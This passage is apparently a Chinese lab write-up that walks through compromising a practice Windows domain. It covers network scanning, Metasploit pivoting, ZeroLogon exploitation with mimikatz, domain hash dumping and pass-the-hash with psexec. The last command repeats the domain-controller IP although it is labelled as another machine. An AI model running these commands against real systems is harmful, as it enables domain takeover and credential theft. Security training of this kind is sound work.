192.168.20.30:445 open 192.168.20.20:445 open 192.168.20.10:3306 open 192.168.20.30:88 open 192.168.20.10:7680 open 192.168.20.10:445 open 192.168.20.30:139 open 192.168.20.10:135 open 192.168.20.10:139 open 192.168.20.20:139 open 192.168.20.30:135 open 192.168.20.20:135 open 192.168.20.20:7001 open [*] alive ports len is: 13 start vulscan [*] 192.168.20.30 [+]DC __MSBROWSE__\WIN-7NRTJO59O7N [+] NetInfo: [*]192.168.20.20 [->]cyberweb [->]192.168.20.20 [*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600 [*] WebTitle:http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://192.168.20.20:7001 [weblogic] 已完成 13/13 [*] 扫描结束,耗时: 24.8144105s 配置路由meterpreter > run post/multi/manage/autoroute [*] Running module against DESKTOP-JFB57A8 (192.168.10.10) [*] Searching for subnets to autoroute. [+] Route added to subnet 192.168.10.0/255.255.255.0 from host's routing table. [+] Route added to subnet 192.168.20.0/255.255.255.0 from host's routing table. meterpreter > run autoroute -p [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.10.0 255.255.255.0 Session 4 192.168.20.0 255.255.255.0 Session 4 设置代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j weblogic（用msf打了几次没成功）域渗透ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞，CVSS V3.0评分10.0，攻击者只需要定位域控主机名及IP，并且可以访问域控，就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。枚举域主机信息，域名为cyberstrikelab.com， Windows 主机名为WIN-7NRTJO59O7N，通过如下内容可以得知主机是域内成员Derived membership: domain member┌──(root㉿kali)-[~] └─# proxychains enum4linux-ng -A 192.168.20.30 -C ============================================================ | Domain Information via SMB session for 192.168.20.30 | ============================================================ [*] Enumerating via unauthenticated SMB session on 445/tcp [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.20.30:445 ... OK [+] Found domain information via SMB NetBIOS computer name: WIN-7NRTJO59O7N NetBIOS domain name: CYBERSTRIKELAB DNS domain: cyberstrikelab.com FQDN: WIN-7NRTJO59O7N.cyberstrikelab.com Derived membership: domain member Derived domain: CYBERSTRIKELAB 上传mimikatz.exeupload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe 使用新版mimikatz可用，旧版没有这个模块，利用过程发现存在zerologonmimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-7NRTJO59O7N$" exit 重置域内hashmimikatz.exe "lsadump::zerologon /target:192.168.20.30 /ntml /null /account:WIN-7NRTJO59O7N$ /exploit" exit 提取域内hash，仅提取 NTDS Section（域级数据），完全过滤 SAM、LSA Secrets 等本地冗余信息，直接输出域内所有用户 / 域机器账户的哈希。proxychains impacket-secretsdump CYBERSTRIKELAB/WIN-7NRTJO59O7N\$@192.168.20.30 -no-pass -just-dc PTH 域控，获取第三个flagproxychains impacket-psexec -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/Administrator@192.168.20.30 PTH另外一台机器，获取第二个flagproxychains impacket-psexec -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/Administrator@192.168.20.30